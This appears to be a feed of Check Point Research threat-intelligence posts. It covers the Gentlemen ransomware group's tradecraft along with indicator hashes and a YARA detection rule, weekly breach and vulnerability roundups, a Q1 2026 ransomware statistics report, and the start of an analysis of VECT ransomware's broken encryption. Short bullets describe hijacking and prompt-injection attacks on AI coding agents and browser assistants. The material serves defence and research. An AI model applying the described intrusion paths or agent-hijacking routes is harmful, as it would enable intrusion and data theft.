“Red team” / Mr Beng clusterMentions Редтим=красный лотос=арсен=баламут=студент and “мистер БЕНГ”; mocks offer of 15k for “source code” of a C2 built on top of white tools (Velociraptor, etc.); ridicules this as overpriced and based on legitimate software.Negative; sees them as overpriced grifters repackaging white tools with heavy marketing.


Conclusion

The Gentlemen RaaS program has quickly evolved into a highly active and structured ransomware ecosystem. With over 320 public victims in 2026 and hundreds more systems visible through related infrastructure, it stands among the most productive RaaS operations that maintain a public data‑leak presence. The leaked Rocket backend and internal chats show that this scale is driven not by a loose crowd, but by a small, tightly coordinated core of about 9 named operators and at least 8 distinct affiliate TOX IDs, all organized around the administrator zeta88 / hastalamuerte, who both runs the platform and participates directly in operations.

The leak reveals a repeatable, human‑operated ransomware playbook: initial access through exposed edge infrastructure (such as VPNs and management interfaces), rapid expansion and privilege escalation, heavy investment in EDR/AV evasion and ETW/logging tampering, and systematic use of shared tools for discovery, lateral movement, credential theft, and data exfiltration. The group actively tracks and evaluates modern vulnerabilities, including CVE-2024-55591, CVE-2025-32433, and CVE-2025-33073and combines them with technique‑driven paths like backup and management‑controller abuse and NTLM relay workflows, giving them a flexible exploitation pipeline.

Overall, The Gentlemen exemplifies how contemporary RaaS programs blend productized ransomware with professional intrusion teams. A small, well‑organized set of operators, supported by curated tooling, structured communication channels, and up‑to‑date exploit knowledge, can generate substantial impact in a short time. For defenders, this underscores the need to harden internet‑facing services, close known misconfigurations and relay paths, and monitor for the specific tools, workflows, and TOX‑based communication patterns tied to this group.


Indicators of Compromise

DescriptionValue
The Gentlemen Windows025fc0976c548fb5a880c83ea3eb21a5f23c5d53c4e51e862bb893c11adf712a
1334f0189a8e6dbc48456fa4b482c5726ab7609f7fa652fcc4c1a96f2334436f
1af419b36a5edefef387409e2b3248c9223f7dc49a4f7b15ea095d371c3a70b2
22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67
24ac3588fb8cfbff63b7fdfcbc7dec1f3c60e54e6f949dd69d68e89e0c89d966
2ed9494e9b7b68415b4eb151c922c82c0191294d0aa443dd2cb5133e6bfe3d5d
3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235
3c2182cb0bc7528829ef03f1b1745a92bcc47d917eb8870862488f21fdf1a6d6
48d9b2ce4fcd6854a3164ce395d7140014e0b58b77680623f3e4ca22d3a6e7fd
4a175eed927c0a477eafb8aa35a93c191748acaa78ac7aecd8ea3c4cd868887c
51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2
62c2c24937d67fdeb43f2c9690ab10e8bb90713af46945048db9a94a465ffcb8
6a3ab9e984a759d55af4e84487d1fc44683065cc9a1089d5aa4ad1c0e4e84a63
860a6177b055a2f5aa61470d17ec3c69da24f1cdf0a782237055cba431158923
87d25d0e5880b3b5cd30106853cbfc6ef1ad38966b30d9bd5b99df46098e546c
8aa0cb69ca2777001e0f4ba0eaab0841592710e4cc5ccd6b0b526d78bbd8bfba
8c87134c1b45e990e9568f0a3899b0076f94be16d3c40fa824ac1e6c6ee892db
91415e0b9fe4e7cbe43ec0558a7adf89423de30d22b00b985c2e4b97e75076b1
994d6d1edb57f945f4284cc0163ec998861c7496d85f6d45c08657c9727186e3
9f61ff4deb8afced8b1ecdc8787a134c63bde632b18293fbfc94a91749e3e454
a7a19cab7aab606f833fa8225bc94ec9570a6666660b02cc41a63fe39ea8b0ad
b67958afc982cafbe1c3f114b444d7f4c91a88a3e7a86f89ab8795ac2110d1e6
c46b5a18ab3fb5fd1c5c8288a41c75bf0170c10b5e829af89370a12c86dd10f8
c7f7b5a6e7d93221344e6368c7ab4abf93e162f7567e1a7bcb8786cb8a183a73
dce2e5cc00eff2493f8ced546dc51f9d5ef78c5ee56805906ec642dfa77a1c70
dfe696ff713318c53fb17731bd4a6585a02c085b590149b19847990b324a0be6
ec368ae0b4369b6ef0da244774995c819c63cffb7fd2132379963b9c1640ccd2
efaf8e7422ffd09c7f03f1a5b4e5c2cc32b05334c18d1ccb9673667f8f43108f
f736be55193c77af346dbe905e25f6a1dee3ec1aedca8989ad2088e4f6576b12
fc75ed2159e0c8274076e46a37671cfb8d677af9f586224da1713df89490a958
The Gentlemen Linux1eece1e1ba4b96e6c784729f0608ad2939cfb67bc4236dfababbe1d09268960c
5dc607c8990841139768884b1b43e1403496d5a458788a1937be139594f01dca
788ba200f776a188c248d6c2029f00b5d34be45d4444f7cb89ffe838c39b8b19


Yara Rule

rule thegentlemen_ransomware
{
    meta:
        author = "@Tera0017/Check Point Research"
        description = "The Gentlemen Ransomware written in GO."
    strings:
        $string1 = "Silent mode (don't rename files)" ascii
        $string2 = "Encrypt only mapped and UNC network shares" ascii
        $string3 = "README-GENTLEMEN.txt" ascii
        $string4 = "gentlemen.bmp" ascii
        $string5 = "gentlemen_system" ascii
        $string6 = "[+] Encryption started. Going background..." ascii
        $string7 = "[+] FULL Encryption started" ascii
    condition:
        uint16(0) == 0x5A4D and 4 of them
}

The post Thus Spoke…The Gentlemen appeared first on Check Point Research.

Received — 11 May 2026 Check Point Research

11th May – Threat Intelligence Report

By: urias
11 May 2026 at 14:49

For the latest discoveries in cyber research for the week of 11th May, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Instructure, the US education technology company behind the Canvas learning platform, has confirmed a major data breach affecting its cloud-hosted environment. Exposed data reportedly includes student and staff records and private messages, while ShinyHunters escalated the attack by defacing hundreds of school login portals with ransom messages.
  • Zara, the flagship brand of Spanish fashion group Inditex, has experienced a data breach tied to a third-party technology provider. Inditex confirmed unauthorized access, and experts verified that 197,400 unique email addresses, order IDs, purchase history, and customer support tickets were exposed.
  • Hungarian media company Mediaworks, which operates dozens of newspapers and online outlets, was hit by a data-theft extortion attack. The company confirmed an intrusion after World Leaks posted 8.5TB of internal files online, reportedly including payroll records, contracts, financial documents, and internal communications.
  • Czech automaker Škoda has fallen victim to a security incident affecting its online shop after attackers exploited a software flaw to gain unauthorized access. Exposed customer data may include names, contact details, order history, and logins, but according to the company passwords payment card data was not affected.

AI THREATS

  • Researchers have uncovered a critical WebSocket hijacking vulnerability in Cline’s local Kanban server, impacting the widely used open‑source AI coding agent. Rated CVSS 9.7 and patched in version 0.1.66, the flaw allowed any website a developer visited to exfiltrate workspace data and inject arbitrary commands into the AI agent.
  • Security researchers found a flaw in Anthropic’s Claude in Chrome extension that allowed other browser extensions to hijack the AI agent. The issue enabled malicious prompts to trigger unauthorized actions and access sensitive browser-connected data, showing how AI assistants can extend browser attack surfaces.
  • Researchers detailed an InstallFix campaign using fake Claude AI installer pages promoted through Google Ads to infect Windows and macOS users. Victims were tricked into running commands that launched multi-stage malware, stole browser data, disabled protections, and established persistence through scheduled tasks.

VULNERABILITIES AND PATCHES

  • Progress alerted customers to CVE-2026-4670, a critical authentication bypass in MOVEit Automation managed file transfer software that allows unauthorized access, and CVE-2026-5174, a privilege escalation flaw. Fixes are available in versions 2025.1.5, 2025.0.9, and 2024.1.8.
  • Ivanti has fixed CVE-2026-6973, a high-severity Endpoint Manager Mobile vulnerability which is exploited as a zero-day. The flaw affects EPMM 12.8.0.0 and earlier and allows attackers with administrator permissions to run remote code, while hundreds of appliances reportedly remain exposed online.
  • Palo Alto Networks PAN-OS Authentication Portal is affected by CVE-2026-0300, a critical buffer overflow flaw allowing unauthenticated attackers to run code with root privileges on affected firewalls. Palo Alto Networks observed active exploitation against exposed portals, with no fix available at this time.
  • Dirty Frag, an unpatched Linux kernel flaw, enables local privilege escalation across Ubuntu, RHEL, Fedora, AlmaLinux, and CentOS Stream. By chaining bugs in IPsec and RxRPC, a local user can gain root access with high reliability, and public proof-of-concept code is available.

THREAT INTELLIGENCE REPORTS

  • Researchers linked Iran’s MuddyWater to using the Chaos ransomware as cover for espionage and data theft. In a recent case, attackers used Microsoft Teams social engineering to harvest credentials and deploy remote tools, then extorted the victim without encrypting files before leaking data.
  • Researchers detailed a Silver Fox campaign targeting organizations in India and Russia with tax-themed phishing emails. The activity delivered the previously undocumented ABCDoor backdoor, ValleyRAT, and related malware, affecting industrial, consulting, retail, and transportation sectors through more than 1,600 socially engineered messages.
  • Researchers unmasked a multi-stage phishing campaign using fake code-of-conduct emails and adversary-in-the-middle tactics to hijack sign-in sessions and bypass multi-factor authentication. Active between April 14 to 16, it targeted more than 35,000 users at 13,000 organizations across 26 countries.
  • Researchers profiled UAT-8302, a China-linked espionage group conducting long-term intrusions against government agencies in South America and southeastern Europe. The actors combine custom backdoors, including NetDraft and CloudSorcerer, with OneDrive and GitHub command channels and open-source tools for reconnaissance and lateral movement.
  • Researchers revealed a software supply chain campaign on NuGet in which five packages impersonating Chinese .NET UI libraries install an infostealer. The packages have recorded nearly 65,000 downloads, putting developer workstations and systems at risk by stealing passwords, SSH keys, and cryptocurrency wallet data.

The post 11th May – Threat Intelligence Report appeared first on Check Point Research.

The State of Ransomware – Q1 2026

11 May 2026 at 11:58

Key Findings

  • Consolidation after peak fragmentation: The top 10 ransomware groups accounted for 71% of all Q1 2026 victims, a sharp reversal from the fragmentation seen in Q3 2025. The ransomware ecosystem is once again consolidating around fewer, more dominant operators.
  • Volume stabilization at historically high levels: There were 2,122 victims posted on data leak sites (DLS), making this period the second-highest Q1 on record. The long growth trend is stabilizing.
  • Qilin’s sustained dominance: Qilin maintained its position as the most prominent ransomware operation for the third consecutive quarter, posting 338 victims.
  • The Gentlemen is the breakout story of Q1 2026 reaching the third place on the global ransomware list, increasing their victim count from 40 victims in Q4 2025 to 166 in Q1 2026.
  • LockBit 5.0 comeback confirmed: LockBit posted 163 victims in Q1 2026, climbing to fourth place.

Ransomware in Q1 2026: Consolidation at Scale

During the first quarter of 2026, we monitored more than 70 active data leak sites (DLS) that collectively listed 2,122 new victims. This figure represents a 12.2% decline from the Q4 2025 all-time record of 2,416 victims but remains the second-highest Q1 on record at 117% above Q1 2024 (977 victims) and is keeping in line with the elevated baseline established through 2025.

Figure 1 – Total number of reported ransomware victims in DLS, per month (Jun 2024 – Mar 2026).

Monthly volumes within Q1 were consistently stable: in January there were 732 recorded victims, 684 in February, and 706 in March. This reflects a sustained operating rate of an average of 707 victims per month in Q1 2026.

The headline year-over-year (YoY) comparison shows a 7.1% decline from the 2,285 victims in Q1 2025. However, this comparison is misleading as the Q1 2025 numbers were heavily inflated by Cl0p’s Cleo mass-exploitation campaign which contributed approximately 390 victims in a single burst. If we exclude Cl0p from both periods, there were 1,894 victims in Q1 2025 versus 1,995 in Q1 2026, an actual YoY increase of 5.3%. The underlying growth trend in ransomware operations persists, even as the most dramatic spikes subside.

From fragmentation to consolidation

The most significant structural development seen in Q1 2026 is not the volume of attacks but the consolidation of the different operators conducting them. After two years of steady fragmentation, during which the number of active groups grew from 51 in Q1 2024 to a peak of 85 in Q3 2025 and the Top-10 share of victims fell from 68% to 57%, the ecosystem has decisively reversed course.

In Q1 2026, the top 10 groups accounted for 71.1% of all DLS-posted victims, which is the highest concentration since Q1 2024 when the ecosystem was far smaller. The number of active groups shrank from 85 to 71. Fourteen groups that were active in Q4 2025 disappeared entirely, while 21 new names appeared. However, most of the newcomers posted fewer than 10 victims, failing to take advantage of the disappearance of established mid-tier operators.

This is a common pattern repeated throughout the ecosystem’s history: law enforcement actions disrupt the ransomware market, affiliates scatter, and survivors who avoid disruption absorb the displaced talent pool and grow. Groups such as Qilin, Akira, The Gentlemen, and LockBit, who together claimed 41% of all victims in Q1, capitalized on the instability of their competitors. In Q1 2026, Qilin alone posted more victims than the combined output of the bottom 50 groups.

This dynamic carries implications beyond statistics. The consolidation of the ecosystem around fewer, more dominant operators changes its character. Larger RaaS brands invest in operational consistency, including functional decryption tools, because their business model depends on the perception that victim payment results in data recovery. In contrast, the ransomware fragmentation we saw in 2025 introduced dozens of transient operators with no such incentive to invest any effort in decryption. An example is Obscura, whose encryption bug renders files over 1 GB permanently unrecoverable regardless of payment. For defenders and incident responders, consolidation means facing fewer but more capable adversaries.

Figure 2 – Top 10 ransomware groups by number of publicly claimed victims – Q1 2026.

Notable surges and declines

Comparing the data between Q4 2025 and Q1 2026 reveals which groups are absorbing the affiliate talent pool, and which are failing to take advantage of it.

Surges:

  • The Gentlemen grew by 315%, going from 40 claimed victims to 166, making them the biggest story of Q1 2026, covered in detail below.
  • LockBit 5.0 activity increased by 106%, from 79 victims to 163.
  • Nightspire, a closed-group operation with OneDrive cloud encryption capability, expanded by 183% from 29 victims to 82, sustaining growth across two consecutive quarters.
  • Play posted a 64% increase, going from 74 victims to 121.

Declines:

  • SafePay fell by 77%, going from 97 victims to 22. SafePay is a centralized, non-RaaS operation whose DLS was marked inactive from mid-March 2026 through early April for unknown reasons.
  • Devman declined by 70%, from 82 victims to 25. The ransomware’s operator “Tramp”, a former Conti and Black Basta affiliate, was added to Interpol’s wanted list in January 2026. All three DLS sites went offline by early February.
  • Sinobi dropped by 42%, from 139 victims to 80. After a strong January (56 victims), activity collapsed to just 7 victims in March. As of the time of this publication, no postings were recorded in April.
Figure 3 – Interpol’s Red Notice for Devman’s operator, Nefedov.

Actor Spotlight: The Gentlemen – The Breakout Story of Q1 2026

The Gentlemen is the most significant new ransomware operation to emerge in recent months. Going from zero victims in August 2025 to 166 in Q1 2026, the group achieved third place globally through a combination of pre-existing access stockpiles, aggressive geographic diversification, and a deliberate rejection of the traditional US-centric targeting model.

Figure 4 – The Gentlemen monthly victim trajectory, February peak: 82 victims in a single month.

Origins: A Qilin defection

The Gentlemen was founded by a threat actor known as Hastalamuerte – an experienced Qilin affiliate, who left the Qilin RaaS program following a dispute over an unpaid commission of approximately $48,000. This explains both its rapid operational capability and its sophistication: the operators started with established tradecraft, tooling, and, crucially, a stockpile of pre-compromised access.

The FortiGate stockpile

The group’s most distinctive asset is a cache of approximately 14,700 pre-exploited FortiGate devices, exploited primarily via CVE-2024-55591 (a critical authentication bypass in FortiOS/FortiProxy). In addition to the exploited devices, the operators maintain 969 validated brute-forced FortiGate VPN credentials ready for attack. This stockpile provides The Gentlemen with a supply of ready-to-use initial access tools far exceeding what typical RaaS affiliates acquire through real-time exploitation or access broker purchases.

How was this stockpile acquired? According to this report, Hastalamuerte was an experienced affiliate who had previously worked with Embargo, LockBit, and Medusa before joining Qilin. Before creating their own RaaS platform, The Gentlemen’s operators “experimented with various affiliate models used by other prominent ransomware groups.” The 14,700-device inventory likely predates the group’s September 2025 launch. Publishing 38 victims within weeks of beginning operation strongly suggests pre-existing access in the form of a massive number of compromised devices rather than real-time exploitation.

A non-Western targeting model

The Gentlemen’s geographic distribution is a striking outlier. Only 13.3% of its victims are based in the United States, compared to the ecosystem average of 49.6%. Thailand (10.8%), Brazil (6.0%), and India (4.2%) all feature prominently on their victim list.

This may reflect the geographic distribution of exploitable FortiGate devices; the group attacks where it has pre-positioned access, and that access happens to be concentrated in APAC and Latin American networks. This is an infrastructure-driven pattern rather than a deliberate targeting strategy: the operators did not choose Thailand or Brazil based on strategic preference but are exploiting access they already have.

However, we cannot exclude a secondary factor: deliberate avoidance of US targets to reduce law enforcement risk. The Gentlemen is a Russian-speaking operation founded by an affiliate who already experienced the consequences of ransomware ecosystem disputes. The decision to exploit a globally distributed stockpile while bypassing US devices – if that is what is occurring – would represent rational risk management given the heightened US law enforcement posture.

LockBit 5.0: Making a Comeback

LockBit posted 163 victims in Q1 2026 (an increase of 106% compared to Q4 2025), climbing from outside the top 10 to fourth place globally. After an initial surge of 85 victims in January (likely to reflect the accumulation of access during the pre-launch period), activity dipped to just 33 victims in February before climbing back to 45 in March. This dip-and-recovery trajectory is characteristic of a program rebuilding its affiliate base instead of exhausting a one-time stockpile, assuming these are genuine reports and not recycled or fictional reports.

Until its takedown in early 2024, LockBit was the most dominant RaaS operation globally, responsible for 20–30% of all data-leak site victim postings. Following Operation Cronos, several arrests and data seizures disrupted the group’s infrastructure. 

Figure 5 – LockBit’s DLS-published victims (Q1 2023 – Q1 2026).

The new LockBit 5.0 was officially launched on the RAMP underground forum in September 2025, coinciding with the sixth anniversary of the operation. The new version introduced multi-platform support (Windows, Linux, ESXi), enhanced evasion and anti-analysis mechanisms, faster encryption routines, and randomized 16-character file extensions to disrupt signature-based detection. New affiliates were required to provide a Bitcoin deposit of approximately $500.

Geographic diversification: from US dominance to global spread

LockBit’s geographic targeting has undergone a dramatic and measurable shift since its last appearance. Historically, the United States accounted for over 50% of LockBit’s victims – consistent with the ecosystem-wide baseline. In Q1 2026, US victims represented just 21.2% of LockBit’s total, with Italy (8.6%), Brazil (8.6%), and Turkey (5.1%) picking up the slack.

The shift away from US victims is new. Despite no documented forum announcements, the circumstantial evidence is strong: the direction is specifically toward non-US and European nations or countries with less aggressive behavior toward ransomware operators such as Italy, Brazil, and Turkey. The result is a nearly 30-percentage-point (pp) drop in US-based victims, despite an overall 106% increase in victims compared to Q4 2025.

The reaction to law enforcement actions may not result in a lower overall attack volume, but operators such as LockBitSUpp appear to be trying to redirect their activity away from the enforcing jurisdictions. Whether this represents a deliberate strategic decision or an emergent consequence of attracting affiliates from different geographic backgrounds remains an open question.

DragonForce: The Cartel Model Under Pressure

DragonForce posted 101 victims in Q1 2026 (an increase of 29% compared to Q4 2025), with a steep climb from 10 victims in January to 35 in February and 56 in March. This trajectory suggests an operation gaining momentum rather than depleting stockpiled access.

DragonForce continues to distinguish itself through its public relations strategy and “cartel” branding, positioning itself as an umbrella organization for multiple sub-brands. However, our investigation indicates that the cartel model is smaller than advertised:

  • Devman, which split from DragonForce in July 2025, saw their victim totals collapse from 82 (Q4 2025) to 25 (Q1 2026). Twenty-four of those victims were posted in January.
  • Coinbase Cartel, initially reported as a DragonForce sub-brand, has been independently linked to the ShinyHunters operation by Bitdefender.
  • Obscura, cited as a potential cartel member, posted only around 20 victims in total.

DragonForce’s technical capabilities remain genuine with multi-platform support and the group actively recruits affiliates. Its data audit service, which analyzes stolen datasets exceeding 300 GB to identify the most valuable information for extortion leverage, represents genuine innovation in the extortion model. However, the broader cartel narrative appears to be more marketing than substance.

Geographic Distribution of Victims – Q1 2026

The geographic distribution of ransomware victims in Q1 2026 maintains the fundamental pattern established over previous quarters: the United States accounts for just under half of all reported cases (49.6%), with Western developed economies making up the clear majority of targets.

Figure 6 – Top 10 targeted countries, Q1 2026.

The most notable development is Thailand’s entry into the top 10 for the first time, driven almost entirely by The Gentlemen, for whom Thai organizations constitute 10.8% of total victims. Taiwan also rose sharply (from 8 victims to 26), while South Korea dropped out entirely. This confirms that Qilin’s Q3 2025 financial sector campaign targeting 30 South Korean organizations was a one-off event rather than a sustained targeting shift.

Per-Actor Geographic Targeting: Distinct Patterns

A per-actor analysis of the top 20 groups’ country distributions reveals that the ecosystem-level averages mask dramatically different targeting strategies. We identified six distinct geographic patterns by measuring each actor’s deviation from the 49.6% US baseline.

Pattern 1 – Extreme US focus (>75% US). These actors target the United States at rates far exceeding the ecosystem average:

  • Play (85.1% US) operates as a closed group with a Russia-nexus lineage and centralized target selection that consistently prefers US organizations.
  • Sinobi (76.2% US) explicitly targets US mid-market manufacturing and construction.
  • Genesis (93.1% US) whose near-exclusive US focus (27 of 29 confirmed victims) and emphasis on the Healthcare sector (20.7%) is striking for an emerging actor with no documented affiliate program.

Pattern 2 – Deliberate US avoidance (<25% US). These actors are going in the opposite direction:

  • Tengu (11.4% US) is the most geographically diversified actor in the top 20, with victims spread across Indonesia (8.6%), Mexico (8.6%), India (6.9%), and Italy (5.8%).
  • LockBit (21.5% US) represents deliberate post-disruption diversification, as discussed above.

Pattern 3 – Vulnerability related distribution:

  • Cl0p’s geographic anomalies (18.1% Canada and 8.7% Australia). Cl0p’s traditional mass exploitation campaigns produce victim distributions that mirror the installed base of the exploited software, in this case EBS campaign (CVE-2025-61882).
  • The Gentlemen (13.3% US) reflects the geographic distribution of its approximately 14,700-device FortiGate access stockpile, which is concentrated in Thailand (10.8%), Brazil (6%), and India (4.2%).

Country-Level Actor Dominance: When One Group Shapes a Nation’s Threat Profile

Flipping the analysis from “which countries does an actor target” to “which actors dominate each country” reveals an even more striking picture. Several countries’ entire ransomware threat profiles are defined by a single actor’s operational choices.

Single-actor-shaped countries:

CountryDominant actorShare
ThailandThe Gentlemen53%
ArgentinaQilin39%
MexicoLockBit37%
AustraliaCl0p34%
SwitzerlandAkira31%
BrazilLockBit31%

Thailand’s case is the most extreme: more than half of all Thai ransomware victims are claimed by The Gentlemen. Without this single group, Thailand would not even appear in the top-10 most-attacked countries. Similarly, without Cl0p’s Oracle EBS campaign, Australia and Canada would show substantially lower victim counts. These findings underscore that country-level ransomware statistics are frequently shaped by one actor’s specific access inventory, software exploitation campaign, or strategic redirection – not by broad shifts in the threat landscape.

Multi-actor convergence countries. Two countries stand out for having three or more actors independently converging to create unusually diverse threat environments:

  • Turkey (23 victims): LockBit (6 victims) + DragonForce (5 victims) + The Gentlemen (5 victims), 70% of Turkey’s victim totals are due to the activity of just three actors.
  • Japan (21 victims): The Gentlemen (6 victims) + Everest (4 victims) + Nightspire (3 victims). = 62% of the victims are due to three distinct actors. Both The Gentlemen and Nightspire exploit the same FortiGate vulnerability (CVE-2024-55591).

Ransomware Attacks by Industry – Q1 2026

The industry distribution of ransomware victims in Q1 2026 shows continued cross-sector impact, with a few notable concentrations.

Figure 7 – Ransomware victims by industry, Q1 2026.

As with geographic patterns, ecosystem-level industry averages mask fundamentally different targeting strategies at the actor level. A per-actor analysis of the top 20 groups reveals that sector selection is driven by at least three distinct observations.

Software footprint targeting. Cl0p’s 53.5% Business Services concentration (+18.6 percentage points above baseline) does not reflect a preference for professional services firms. It reflects the user base of Oracle EBS, the enterprise application exploited in the Q1 2026 campaign. Mass exploitation campaigns produce industry distributions that mirror the deployment pattern of the exploited software. This is the same dynamic observed in Cl0p’s geographic analysis, where Canada and Australia were over-represented because of Oracle EBS adoption.

Operational disruption maximization. Akira’s targeting of Consumer Goods (23.9%, +9.8 percentage points above baseline) and Industrial Manufacturing (17.8%, +6.7 percentage points above baseline), a combined 41.7% versus the 25.1% baseline, is consistent with an economically optimized model. These sectors share high downtime costs (production lines, supply chain dependencies) and complex IT/OT environments that make recovery without decryption keys extremely difficult. With $244 million in total proceeds and a 34% share of IR engagements, Akira’s sector selection reflects deliberate targeting of firms where the pressure to pay is greatest. This is not opportunistic; it’s the Conti lineage playbook applied to the sectors where it generates the highest return per incident.

Anubis stands apart from all other top-20 actors in its willingness to target healthcare (13.0%, +8.3 percentage points above baseline) and critical infrastructure (8.7%, +7.7 percentage points above baseline).

Conclusion

In Q1 2026, the ransomware ecosystem entered a new phase. After two years of steady fragmentation, the market is reconsolidating around a smaller number of dominant operators. Qilin, Akira, The Gentlemen, and LockBit together account for 41% of all victims. Domination by the top-10 actors has returned to levels not seen since early 2024.

This consolidation is not a return to the previous state. The emerging dominant groups are more technically capable, more geographically diversified, and more resilient to disruption than their predecessors. At the same time, the economic foundations of ransomware are showing signs of stress. Payment rates have fallen to historic lows. Mass data-theft campaigns are generating diminishing returns. The gap between the growing number of DLS-posted victims (2,122 in Q1 2026) and the declining monetization per victim may accelerate the current consolidation squeezing out operators who cannot achieve sufficient scale or sophistication to remain profitable.

The post The State of Ransomware – Q1 2026 appeared first on Check Point Research.

4th May – Threat Intelligence Report

By: urias
4 May 2026 at 15:49

For the latest discoveries in cyber research for the week of 4th May, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Medtronic, a global medical device maker, has disclosed a cyberattack on its corporate IT systems. An unauthorized party accessed data, while the company reported no impact on products, operations, or financial systems. Threat group ShinyHunters claimed the theft of 9 million records, and Medtronic is evaluating what data was exposed.
  • Vimeo, a global video hosting platform, has confirmed a data breach stemming from a compromise at analytics vendor Anodot. Exposed data included internal operational information, video titles and metadata, and some customer email addresses, while passwords, payment data, and video content were not accessed.
  • Threat actors have abused the account creation process of the online trading platform Robinhood to launch a phishing campaign that used emails from Robinhood official mailing account. The emails contained links to phishing sites and passed security checks. Robinhood stated that no accounts or funds were compromised and has since removed the vulnerable “Device” field.
  • Trellix, a major endpoint security and XDR vendor, was hit by a source code repository breach after attackers accessed a portion of its internal code. The company engaged forensic experts and law enforcement and claims it has found no evidence of product tampering, pipeline compromise, or active exploitation so far.

AI THREATS

  • Researchers pinpointed CVE-2026-26268, a flaw in Cursor’s coding environment that enables remote code execution when its AI agent interacts with a cloned malicious repository. The attack chains Git hooks and bare repositories to run attacker scripts, risking exposure of source code, tokens, and internal tools.
  • Researchers exposed Bluekit, a phishing-as-a-service platform that bundles 40-plus templates and an AI Assistant using GPT-4.1, Claude, Gemini, Llama, and DeepSeek. The AI-assisted toolkit centralizes domain setup, realistic login clones, anti-analysis filters, real-time session monitoring, and Telegram-based exfiltration.
  • Researchers demonstrated an AI-enabled supply chain attack in which Anthropic’s Claude Opus co-authored a code commit that introduced PromptMink malware into an open-source autonomous crypto trading project. The hidden dependency siphoned credentials, planted persistent SSH access, and stole source code, enabling wallet takeover.

VULNERABILITIES AND PATCHES

  • Microsoft has fixed a privilege escalation flaw in Microsoft Entra ID that allowed the Agent ID Administrator role for AI agents to take over any service account. Researchers published a proof-of-concept showing attackers could add credentials and impersonate privileged identities.
  • cPanel has addressed CVE-2026-41940, a critical authentication bypass in cPanel and WHM that is being actively exploited in the wild as a zero-day, and allows full administrative control without credentials. Patches were issued on April 28, and Shadowserver observed 44,000 internet addresses scanning or attacking decoy systems.

Check Point IPS provides protection against this threat (cPanel Authentication Bypass (CVE-2026-41940))

  • Google has released patches for a critical code execution flaw in the Gemini CLI and its GitHub Action that allowed outsiders to run commands on build servers in CI/CD pipelines. The issue automatically trusted workspace files during automated jobs, allowing malicious pull requests to trigger code execution.
  • LiteLLM proxy versions 1.81.16 to 1.83.6 are affected by CVE-2026-42208, a critical SQL injection flaw used to manage large language model API keys. Attackers can read and potentially alter the proxy database, with exploitation attempts observed about 36 hours after disclosure.

Check Point IPS provides protection against this threat (LiteLLM SQL Injection (CVE-2026-42208))

 

THREAT INTELLIGENCE REPORTS

  • Check Point Research has revealed that the VECT 2.0 ransomware effectively acts as a data wiper across Windows, Linux, and ESXi. A critical encryption mistake discards required decryption information for files larger than 128 KB, making recovery impossible even after payment.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

  • Researchers analyzed a Mirai-based botnet campaign targeting Brazilian internet providers, abusing TP-Link Archer AX21 routers via CVE-2023-1389 and open DNS servers for high-volume amplification attacks. Leaked files linked control activity to infrastructure and SSH keys associated with DDoS mitigation firm Huge Networks.
  • Researchers uncovered a large-scale phishing campaign, dubbed AccountDumpling, that abuses Google AppSheet email services to hijack Facebook accounts. The operation was linked to Vietnam based attackers and is using cloned support pages, reward lures, and live 2FA collection, compromising over 30,000 users and monetizing stolen access through Telegram.
  • Researchers documented a TeamPCP supply chain campaign that compromised four SAP npm packages used in cloud development workflows. The malicious installers harvested developer and cloud credentials across GitHub, npm, and major providers, enabling propagation and downstream compromises before the packages were removed.

 

The post 4th May – Threat Intelligence Report appeared first on Check Point Research.

VECT: Ransomware by design, Wiper by accident

28 April 2026 at 15:03

Key Takeaways

  • Check Point Research discovers that the VECT 2.0 ransomware permanently destroys “large files” rather than encrypting them. A critical flaw in the encryption implementation, identical across all three platform variants (Windows, Linux, ESXi), discards three of four decryption nonces for every file above 131,072 bytes (128 KB). Full recovery is impossible for anyone, including the attacker. At a threshold of only 128 KB, this effectively makes VECT a wiper for virtually any file containing meaningful data, enterprise assets such as VM disks, databases, documents and backups included. CPR confirmed this flaw is present across all publicly available VECT versions.
  • The cipher is misidentified in public reporting. VECT uses raw ChaCha20-IETF (RFC 8439) with no authentication, not ChaCha20-Poly1305 AEAD as claimed in several widely cited threat intelligence reports (and VECT’s initial advertisement). There is no Poly1305 MAC and no integrity protection.
  • Advertised encryption speed modes are not implemented. The --fast, --medium, and --secure flags present across Linux and ESXi variants are parsed and then silently ignored. Every execution applies identical hardcoded thresholds regardless of operator selection.
  • Three platforms, one flawed engine: Windows, Linux, and ESXi variants share an identical encryption design built on libsodium, with the same file-size thresholds, the same four-chunk logic, and the same nonce-handling flaw throughout, confirming a single codebase ported across platforms.
  • Professional facade, amateur execution: beyond the nonce flaw, CPR identified multiple additional bugs and design failures across all variants, from self-cancelling string obfuscation and permanently unreachable anti-analysis code, to a thread scheduler that actively degrades the encryption performance it meant to improve.

Background

VECT Ransomware is a Ransomware-as-a-Service (RaaS) program that made its first appearance in December 2025 on a Russian-language cybercrime forum. After claiming their first two victims in January 2026, the group got back into the public eye due to an announcement of a partnership with TeamPCP, the actor behind several supply-chain attacks in March 2026. These attacks injected malware into popular software packages such as Trivy, Checkmarx’ KICS, LiteLLM and Telnyx, affecting a large base of downstream consumers. Shortly after these attacks made headlines, VECT made a post on BreachForums, announcing their partnership with TeamPCP, with the goal to exploit the companies affected by those supply chain attacks.

Figure 1: Announcement of partnership with BreachForums and TeamPCP.

In addition, VECT announced a partnership with BreachForums itself, promising that every registered forum user will become an affiliate and thus be able to use the VECT ransomware, negotiation platform and leak site for operations. Traditionally, most ransomware groups allow affiliates to join either based on reputation or through paying a fee. As of April 2026, this partnership is in full effect:

Figure 2: Partnership release page on BreachForums.
Figure 3: Distribution of access keys to all members of BreachForums via a forum private message.

While these actions show an ambitious project, the group’s current leak site only lists two victims, both originating from the TeamPCP supply chain attacks:

Figure 4: VECT darknet leak site.

The VECT Ransomware is written in C++ and, with version 2.0 released in February 2026, VECT supports Windows and Linux hosts as well as ESXi hypervisors. The group claims to have built all three lockers from scratch. Additionally, a forum post mentions that dedicated “Cloud Lockers”, likely targeting various cloud storage services, will be made available for affiliates that will prove their skills through a quiz or puzzle challenge in the near future.

Introduction: Ransomware Analysis Overview

